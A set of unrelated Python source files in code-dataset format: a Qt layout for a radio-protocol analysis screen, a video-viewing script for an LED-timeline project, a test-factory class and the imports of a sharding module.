sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbDecoding.sizePolicy().hasHeightForWidth())
self.cbDecoding.setSizePolicy(sizePolicy)
self.cbDecoding.setSizeAdjustPolicy(QtWidgets.QComboBox.AdjustToContents)
self.cbDecoding.setObjectName("cbDecoding")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.cbDecoding.addItem("")
self.verticalLayout.addWidget(self.cbDecoding)
self.lEncodingErrors = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lEncodingErrors.sizePolicy().hasHeightForWidth())
self.lEncodingErrors.setSizePolicy(sizePolicy)
self.lEncodingErrors.setObjectName("lEncodingErrors")
self.verticalLayout.addWidget(self.lEncodingErrors)
self.lDecodingErrorsValue = QtWidgets.QLabel(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lDecodingErrorsValue.sizePolicy().hasHeightForWidth())
self.lDecodingErrorsValue.setSizePolicy(sizePolicy)
self.lDecodingErrorsValue.setObjectName("lDecodingErrorsValue")
self.verticalLayout.addWidget(self.lDecodingErrorsValue)
self.labelDecodingState = QtWidgets.QLabel(self.scrollAreaWidgetContents)
self.labelDecodingState.setObjectName("labelDecodingState")
self.verticalLayout.addWidget(self.labelDecodingState)
self.cbShowDiffs = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.cbShowDiffs.sizePolicy().hasHeightForWidth())
self.cbShowDiffs.setSizePolicy(sizePolicy)
self.cbShowDiffs.setObjectName("cbShowDiffs")
self.verticalLayout.addWidget(self.cbShowDiffs)
self.chkBoxShowOnlyDiffs = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
self.chkBoxShowOnlyDiffs.setObjectName("chkBoxShowOnlyDiffs")
self.verticalLayout.addWidget(self.chkBoxShowOnlyDiffs)
self.chkBoxOnlyShowLabelsInProtocol = QtWidgets.QCheckBox(self.scrollAreaWidgetContents)
self.chkBoxOnlyShowLabelsInProtocol.setObjectName("chkBoxOnlyShowLabelsInProtocol")
self.verticalLayout.addWidget(self.chkBoxOnlyShowLabelsInProtocol)
self.btnAnalyze = QtWidgets.QToolButton(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnAnalyze.sizePolicy().hasHeightForWidth())
self.btnAnalyze.setSizePolicy(sizePolicy)
self.btnAnalyze.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
self.btnAnalyze.setToolButtonStyle(QtCore.Qt.ToolButtonTextOnly)
self.btnAnalyze.setObjectName("btnAnalyze")
self.verticalLayout.addWidget(self.btnAnalyze)
self.stackedWidgetLogicAnalysis = QtWidgets.QStackedWidget(self.scrollAreaWidgetContents)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.stackedWidgetLogicAnalysis.sizePolicy().hasHeightForWidth())
self.stackedWidgetLogicAnalysis.setSizePolicy(sizePolicy)
self.stackedWidgetLogicAnalysis.setObjectName("stackedWidgetLogicAnalysis")
self.pageButtonAnalyzer = QtWidgets.QWidget()
self.pageButtonAnalyzer.setObjectName("pageButtonAnalyzer")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.pageButtonAnalyzer)
self.verticalLayout_5.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.stackedWidgetLogicAnalysis.addWidget(self.pageButtonAnalyzer)
self.pageProgressBar = QtWidgets.QWidget()
self.pageProgressBar.setObjectName("pageProgressBar")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.pageProgressBar)
self.verticalLayout_6.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.progressBarLogicAnalyzer = QtWidgets.QProgressBar(self.pageProgressBar)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressBarLogicAnalyzer.sizePolicy().hasHeightForWidth())
self.progressBarLogicAnalyzer.setSizePolicy(sizePolicy)
self.progressBarLogicAnalyzer.setProperty("value", 24)
self.progressBarLogicAnalyzer.setObjectName("progressBarLogicAnalyzer")
self.verticalLayout_6.addWidget(self.progressBarLogicAnalyzer)
self.stackedWidgetLogicAnalysis.addWidget(self.pageProgressBar)
self.verticalLayout.addWidget(self.stackedWidgetLogicAnalysis)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout_8.addWidget(self.scrollArea)
self.frame_3 = QtWidgets.QFrame(self.splitter_2)
self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.frame_3)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.lineEditSearch = QtWidgets.QLineEdit(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditSearch.sizePolicy().hasHeightForWidth())
self.lineEditSearch.setSizePolicy(sizePolicy)
self.lineEditSearch.setAcceptDrops(False)
self.lineEditSearch.setClearButtonEnabled(True)
self.lineEditSearch.setObjectName("lineEditSearch")
self.gridLayout_2.addWidget(self.lineEditSearch, 0, 0, 1, 1)
self.btnSearchSelectFilter = QtWidgets.QToolButton(self.frame_3)
self.btnSearchSelectFilter.setPopupMode(QtWidgets.QToolButton.MenuButtonPopup)
self.btnSearchSelectFilter.setToolButtonStyle(QtCore.Qt.ToolButtonTextOnly)
self.btnSearchSelectFilter.setObjectName("btnSearchSelectFilter")
self.gridLayout_2.addWidget(self.btnSearchSelectFilter, 0, 1, 1, 1)
self.lFilterShown = QtWidgets.QLabel(self.frame_3)
self.lFilterShown.setObjectName("lFilterShown")
self.gridLayout_2.addWidget(self.lFilterShown, 0, 2, 1, 1)
self.btnPrevSearch = QtWidgets.QToolButton(self.frame_3)
self.btnPrevSearch.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnPrevSearch.sizePolicy().hasHeightForWidth())
self.btnPrevSearch.setSizePolicy(sizePolicy)
self.btnPrevSearch.setMaximumSize(QtCore.QSize(20, 16777215))
icon = QtGui.QIcon.fromTheme("go-previous")
self.btnPrevSearch.setIcon(icon)
self.btnPrevSearch.setObjectName("btnPrevSearch")
self.gridLayout_2.addWidget(self.btnPrevSearch, 0, 3, 1, 1)
self.lSearchCurrent = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSearchCurrent.sizePolicy().hasHeightForWidth())
self.lSearchCurrent.setSizePolicy(sizePolicy)
self.lSearchCurrent.setStyleSheet("QLabel\n"
"{\n"
" qproperty-alignment: AlignCenter;\n"
"}")
self.lSearchCurrent.setObjectName("lSearchCurrent")
self.gridLayout_2.addWidget(self.lSearchCurrent, 0, 4, 1, 1)
self.lSlash = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSlash.sizePolicy().hasHeightForWidth())
self.lSlash.setSizePolicy(sizePolicy)
self.lSlash.setAlignment(QtCore.Qt.AlignCenter)
self.lSlash.setObjectName("lSlash")
self.gridLayout_2.addWidget(self.lSlash, 0, 5, 1, 1)
self.lSearchTotal = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lSearchTotal.sizePolicy().hasHeightForWidth())
self.lSearchTotal.setSizePolicy(sizePolicy)
self.lSearchTotal.setStyleSheet("QLabel\n"
"{\n"
" qproperty-alignment: AlignCenter;\n"
"}")
self.lSearchTotal.setObjectName("lSearchTotal")
self.gridLayout_2.addWidget(self.lSearchTotal, 0, 6, 1, 1)
self.btnNextSearch = QtWidgets.QToolButton(self.frame_3)
self.btnNextSearch.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btnNextSearch.sizePolicy().hasHeightForWidth())
self.btnNextSearch.setSizePolicy(sizePolicy)
self.btnNextSearch.setMaximumSize(QtCore.QSize(20, 16777215))
icon = QtGui.QIcon.fromTheme("go-next")
self.btnNextSearch.setIcon(icon)
self.btnNextSearch.setObjectName("btnNextSearch")
self.gridLayout_2.addWidget(self.btnNextSearch, 0, 7, 1, 1)
spacerItem = QtWidgets.QSpacerItem(60, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem, 0, 8, 1, 1)
self.line = QtWidgets.QFrame(self.frame_3)
self.line.setFrameShape(QtWidgets.QFrame.VLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.gridLayout_2.addWidget(self.line, 0, 9, 1, 1)
self.label_2 = QtWidgets.QLabel(self.frame_3)
self.label_2.setObjectName("label_2")
self.gridLayout_2.addWidget(self.label_2, 0, 10, 1, 1)
self.lblRSSI = QtWidgets.QLabel(self.frame_3)
self.lblRSSI.setObjectName("lblRSSI")
self.gridLayout_2.addWidget(self.lblRSSI, 0, 11, 1, 1)
self.line_2 = QtWidgets.QFrame(self.frame_3)
self.line_2.setFrameShape(QtWidgets.QFrame.VLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.gridLayout_2.addWidget(self.line_2, 0, 12, 1, 1)
self.label_3 = QtWidgets.QLabel(self.frame_3)
self.label_3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_3.setObjectName("label_3")
self.gridLayout_2.addWidget(self.label_3, 0, 13, 1, 1)
self.lTime = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lTime.sizePolicy().hasHeightForWidth())
self.lTime.setSizePolicy(sizePolicy)
self.lTime.setTextFormat(QtCore.Qt.PlainText)
self.lTime.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.lTime.setObjectName("lTime")
self.gridLayout_2.addWidget(self.lTime, 0, 14, 1, 1)
self.verticalLayout_3.addLayout(self.gridLayout_2)
self.tblViewProtocol = ProtocolTableView(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tblViewProtocol.sizePolicy().hasHeightForWidth())
self.tblViewProtocol.setSizePolicy(sizePolicy)
self.tblViewProtocol.setAcceptDrops(True)
self.tblViewProtocol.setAutoFillBackground(True)
self.tblViewProtocol.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tblViewProtocol.setFrameShadow(QtWidgets.QFrame.Sunken)
self.tblViewProtocol.setLineWidth(1)
self.tblViewProtocol.setAutoScroll(True)
self.tblViewProtocol.setDragDropMode(QtWidgets.QAbstractItemView.DropOnly)
self.tblViewProtocol.setAlternatingRowColors(True)
self.tblViewProtocol.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.tblViewProtocol.setTextElideMode(QtCore.Qt.ElideNone)
self.tblViewProtocol.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.tblViewProtocol.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.tblViewProtocol.setShowGrid(False)
self.tblViewProtocol.setGridStyle(QtCore.Qt.NoPen)
self.tblViewProtocol.setSortingEnabled(False)
self.tblViewProtocol.setWordWrap(False)
self.tblViewProtocol.setCornerButtonEnabled(False)
self.tblViewProtocol.setObjectName("tblViewProtocol")
self.tblViewProtocol.horizontalHeader().setDefaultSectionSize(40)
self.verticalLayout_3.addWidget(self.tblViewProtocol)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.lBits = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lBits.sizePolicy().hasHeightForWidth())
self.lBits.setSizePolicy(sizePolicy)
self.lBits.setMaximumSize(QtCore.QSize(16777215, 15))
self.lBits.setObjectName("lBits")
self.horizontalLayout_3.addWidget(self.lBits)
self.lBitsSelection = QtWidgets.QLineEdit(self.frame_3)
self.lBitsSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lBitsSelection.setAcceptDrops(False)
self.lBitsSelection.setReadOnly(True)
self.lBitsSelection.setObjectName("lBitsSelection")
self.horizontalLayout_3.addWidget(self.lBitsSelection)
self.lHex = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lHex.sizePolicy().hasHeightForWidth())
self.lHex.setSizePolicy(sizePolicy)
self.lHex.setMaximumSize(QtCore.QSize(16777215, 15))
self.lHex.setObjectName("lHex")
self.horizontalLayout_3.addWidget(self.lHex)
self.lHexSelection = QtWidgets.QLineEdit(self.frame_3)
self.lHexSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lHexSelection.setAcceptDrops(False)
self.lHexSelection.setReadOnly(True)
self.lHexSelection.setObjectName("lHexSelection")
self.horizontalLayout_3.addWidget(self.lHexSelection)
self.lDecimal = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lDecimal.sizePolicy().hasHeightForWidth())
self.lDecimal.setSizePolicy(sizePolicy)
self.lDecimal.setMaximumSize(QtCore.QSize(16777215, 15))
self.lDecimal.setObjectName("lDecimal")
self.horizontalLayout_3.addWidget(self.lDecimal)
self.lDecimalSelection = QtWidgets.QLineEdit(self.frame_3)
self.lDecimalSelection.setMaximumSize(QtCore.QSize(16777215, 20))
self.lDecimalSelection.setAcceptDrops(False)
self.lDecimalSelection.setReadOnly(True)
self.lDecimalSelection.setObjectName("lDecimalSelection")
self.horizontalLayout_3.addWidget(self.lDecimalSelection)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_3.addItem(spacerItem1)
self.lNumSelectedColumns = QtWidgets.QLabel(self.frame_3)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lNumSelectedColumns.sizePolicy().hasHeightForWidth())
self.lNumSelectedColumns.setSizePolicy(sizePolicy)
self.lNumSelectedColumns.setObjectName("lNumSelectedColumns")
self.horizontalLayout_3.addWidget(self.lNumSelectedColumns)
self.lColumnsSelectedText = QtWidgets.QLabel(self.frame_3)
self.lColumnsSelectedText.setObjectName("lColumnsSelectedText")
self.horizontalLayout_3.addWidget(self.lColumnsSelectedText)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.verticalLayout_4.addWidget(self.splitter_2)
self.frame = QtWidgets.QFrame(self.splitter)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.gridLayout = QtWidgets.QGridLayout(self.frame)
self.gridLayout.setObjectName("gridLayout")
self.label = QtWidgets.QLabel(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.tblLabelValues = LabelValueTableView(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tblLabelValues.sizePolicy().hasHeightForWidth())
self.tblLabelValues.setSizePolicy(sizePolicy)
self.tblLabelValues.setAlternatingRowColors(True)
self.tblLabelValues.setShowGrid(False)
self.tblLabelValues.setObjectName("tblLabelValues")
self.tblLabelValues.horizontalHeader().setVisible(True)
self.tblLabelValues.horizontalHeader().setCascadingSectionResizes(False)
self.tblLabelValues.horizontalHeader().setDefaultSectionSize(150)
self.tblLabelValues.horizontalHeader().setStretchLastSection(True)
self.tblLabelValues.verticalHeader().setVisible(False)
self.gridLayout.addWidget(self.tblLabelValues, 1, 1, 2, 1)
self.listViewLabelNames = ProtocolLabelListView(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.listViewLabelNames.sizePolicy().hasHeightForWidth())
self.listViewLabelNames.setSizePolicy(sizePolicy)
self.listViewLabelNames.setAcceptDrops(False)
self.listViewLabelNames.setObjectName("listViewLabelNames")
self.gridLayout.addWidget(self.listViewLabelNames, 2, 0, 1, 1)
self.lblLabelValues = QtWidgets.QLabel(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblLabelValues.sizePolicy().hasHeightForWidth())
self.lblLabelValues.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lblLabelValues.setFont(font)
self.lblLabelValues.setAlignment(QtCore.Qt.AlignCenter)
self.lblLabelValues.setObjectName("lblLabelValues")
self.gridLayout.addWidget(self.lblLabelValues, 0, 1, 1, 1)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.cbMessagetypes = QtWidgets.QComboBox(self.frame)
self.cbMessagetypes.setEditable(True)
self.cbMessagetypes.setInsertPolicy(QtWidgets.QComboBox.NoInsert)
self.cbMessagetypes.setObjectName("cbMessagetypes")
self.horizontalLayout.addWidget(self.cbMessagetypes)
self.btnMessagetypeSettings = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("preferences-other")
self.btnMessagetypeSettings.setIcon(icon)
self.btnMessagetypeSettings.setObjectName("btnMessagetypeSettings")
self.horizontalLayout.addWidget(self.btnMessagetypeSettings)
self.btnAddMessagetype = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("list-add")
self.btnAddMessagetype.setIcon(icon)
self.btnAddMessagetype.setObjectName("btnAddMessagetype")
self.horizontalLayout.addWidget(self.btnAddMessagetype)
self.btnRemoveMessagetype = QtWidgets.QToolButton(self.frame)
icon = QtGui.QIcon.fromTheme("list-remove")
self.btnRemoveMessagetype.setIcon(icon)
self.btnRemoveMessagetype.setObjectName("btnRemoveMessagetype")
self.horizontalLayout.addWidget(self.btnRemoveMessagetype)
self.gridLayout.addLayout(self.horizontalLayout, 1, 0, 1, 1)
self.verticalLayout_2.addWidget(self.splitter)
self.retranslateUi(FAnalysis)
self.stackedWidgetLogicAnalysis.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(FAnalysis)
def retranslateUi(self, FAnalysis):
_translate = QtCore.QCoreApplication.translate
FAnalysis.setWindowTitle(_translate("FAnalysis", "Frame"))
self.label_5.setText(_translate("FAnalysis", "Protocols:"))
self.btnSaveProto.setText(_translate("FAnalysis", "Save current protocol.."))
self.label_4.setText(_translate("FAnalysis", "Participants:"))
self.cbProtoView.setToolTip(_translate("FAnalysis", "<html><head/><body><p>Set the desired view here.</p></body></html>"))
self.cbProtoView.setItemText(0, _translate("FAnalysis", "Bits"))
self.cbProtoView.setItemText(1, _translate("FAnalysis", "Hex"))
self.cbProtoView.setItemText(2, _translate("FAnalysis", "ASCII"))
self.cbDecoding.setItemText(0, _translate("FAnalysis", "NRZ"))
self.cbDecoding.setItemText(1, _translate("FAnalysis", "Manchester"))
self.cbDecoding.setItemText(2, _translate("FAnalysis", "Manchester II"))
self.cbDecoding.setItemText(3, _translate("FAnalysis", "Differential Manchester"))
self.cbDecoding.setItemText(4, _translate("FAnalysis", "..."))
self.lEncodingErrors.setText(_translate("FAnalysis", "Decoding errors for message:"))
self.lDecodingErrorsValue.setText(_translate("FAnalysis", "0 (0.00%) "))
self.labelDecodingState.setText(_translate("FAnalysis", "SUCCESS"))
self.cbShowDiffs.setText(_translate("FAnalysis", "Mark diffs in protocol"))
self.chkBoxShowOnlyDiffs.setText(_translate("FAnalysis", "Show only diffs in protocol"))
self.chkBoxOnlyShowLabelsInProtocol.setText(_translate("FAnalysis", "Show only labels in protocol"))
self.btnAnalyze.setText(_translate("FAnalysis", "Analyze"))
self.lineEditSearch.setPlaceholderText(_translate("FAnalysis", "Search Pattern"))
self.btnSearchSelectFilter.setText(_translate("FAnalysis", "Search"))
self.lFilterShown.setText(_translate("FAnalysis", "shown: 42/108"))
self.btnPrevSearch.setText(_translate("FAnalysis", "<"))
self.lSearchCurrent.setText(_translate("FAnalysis", "-"))
self.lSlash.setText(_translate("FAnalysis", "/"))
self.lSearchTotal.setText(_translate("FAnalysis", "-"))
self.btnNextSearch.setText(_translate("FAnalysis", ">"))
self.label_2.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Received Signal Strength Indicator</span> indicates the average signal power of the current message.</p></body></html>"))
self.label_2.setText(_translate("FAnalysis", "RSSI:"))
self.lblRSSI.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Received Signal Strength Indicator</span> indicates the average signal power of the current message.</p></body></html>"))
self.lblRSSI.setText(_translate("FAnalysis", "1.04"))
self.label_3.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Message Start</span> is the point in time when a protocol message begins. Additionally the relative time (+ ...) from the previous message is shown.</p></body></html>"))
self.label_3.setText(_translate("FAnalysis", "Timestamp:"))
self.lTime.setToolTip(_translate("FAnalysis", "<html><head/><body><p>The <span style=\" font-weight:600;\">Message</span><span style=\" font-weight:600;\">Start</span> is the point in time when a protocol message begins. Additionally the relative time (+ ...) from the previous message is shown.</p></body></html>"))
self.lTime.setText(_translate("FAnalysis", "0 (+0)"))
self.lBits.setText(_translate("FAnalysis", "Bit:"))
self.lHex.setText(_translate("FAnalysis", "Hex:"))
self.lDecimal.setText(_translate("FAnalysis", "Decimal:"))
self.lNumSelectedColumns.setText(_translate("FAnalysis", "0"))
self.lColumnsSelectedText.setText(_translate("FAnalysis", "Column(s) selected"))
self.label.setText(_translate("FAnalysis", "Message type:"))
self.listViewLabelNames.setToolTip(_translate("FAnalysis", "Manage your estimations for protocol fields here. To add custom field types use Rightclick -> Edit."))
self.lblLabelValues.setText(_translate("FAnalysis", "Label values for message"))
self.btnMessagetypeSettings.setToolTip(_translate("FAnalysis", "Settings for message type"))
self.btnMessagetypeSettings.setText(_translate("FAnalysis", "..."))
self.btnAddMessagetype.setToolTip(_translate("FAnalysis", "Add a new message type"))
self.btnAddMessagetype.setText(_translate("FAnalysis", "..."))
self.btnRemoveMessagetype.setToolTip(_translate("FAnalysis", "Delete current message type"))
self.btnRemoveMessagetype.setText(_translate("FAnalysis", "..."))
from urh.ui.views.LabelValueTableView import LabelValueTableView
from urh.ui.views.ProtocolLabelListView import ProtocolLabelListView
from urh.ui.views.ProtocolTableView import ProtocolTableView
from urh.ui.views.ProtocolTreeView import ProtocolTreeView
from . import urh_rc
| 2.015625 | 2 |
view_all_videos.py | ethall/LED-Timeline | 1 | 12798007 | <filename>view_all_videos.py
import os
import cv2 as cv
from _util import Scrubber, get_frames
from p01_extract_valid_frames import extract_valid_frames
from p02_denoise import denoise
from p03_gray import to_grayscale
from p04_diff import to_intensity_difference
if not os.path.exists("target_p01_valid.mp4"):
extract_valid_frames("target.mp4", "target_p01_valid.mp4")
color_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p01_valid.mp4")), window_title="color"
)
color_movie_viewer.create()
color_movie_viewer.wait()
if not os.path.exists("target_p02_denoised.mp4"):
denoise("target_p01_valid.mp4", "target_p02_denoised.mp4")
denoised_color_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p02_denoised.mp4")), window_title="denoised color"
)
denoised_color_movie_viewer.create()
denoised_color_movie_viewer.wait()
if not os.path.exists("target_p03_gray.mp4"):
to_grayscale("target_p02_denoised.mp4", "target_p03_gray.mp4")
gray_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p03_gray.mp4")), window_title="gray"
)
gray_movie_viewer.create()
gray_movie_viewer.wait()
if not os.path.exists("target_p04_diff.mp4"):
to_intensity_difference("target_p03_gray.mp4", "target_p04_diff.mp4")
scaled_diff_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p04_diff.mp4")), window_title="scaled diff"
)
scaled_diff_viewer.create()
scaled_diff_viewer.wait()
if not os.path.exists("target_p05_detect.mp4"):
print("Skipping part 5: video does not exist")
print("It can be created by running the 'p05_detect.py' script")
else:
gray_movie_viewer = Scrubber(
get_frames(cv.VideoCapture("target_p05_detect.mp4")), window_title="detect"
)
gray_movie_viewer.create()
gray_movie_viewer.wait()
| 2.765625 | 3 |
slash/core/runnable_test_factory.py | omergertel/slash | 0 | 12798008 | from .metadata import Metadata
class RunnableTestFactory(object):
def __init__(self, file_path='', module_name='', factory_name=''):
super(RunnableTestFactory, self).__init__()
self.file_path = file_path
self.module_name = module_name
self.factory_name = factory_name
def generate_tests(self, fixture_store):
"""
Generates :class:`.RunnableTest` instances to run
Do not override this method directly. Use :func:`.RunnableTestFactory._generate_tests` instead.
"""
for address_in_factory, test in self._generate_tests(fixture_store):
assert test.__slash__ is None
test.__slash__ = Metadata(self, test, address_in_factory)
yield test
def _generate_tests(self, fixture_store):
raise NotImplementedError() # pragma: no cover
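
# Minimal sketch of a concrete factory; MyRunnableTest and the address string
# are hypothetical, only the override point (_generate_tests) comes from above:
#
#     class MyTestFactory(RunnableTestFactory):
#         def _generate_tests(self, fixture_store):
#             yield 'my_address', MyRunnableTest()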
| 2.4375 | 2 |
shardingpy/parsing/parser/context/condition.py | hongfuli/sharding-py | 1 | 12798009 | # -*- coding: utf-8 -*-
from collections import OrderedDict, defaultdict
from shardingpy.api.algorithm.sharding.values import ListShardingValue, RangeShardingValue
from shardingpy.constant import ShardingOperator
from shardingpy.exception import UnsupportedOperationException
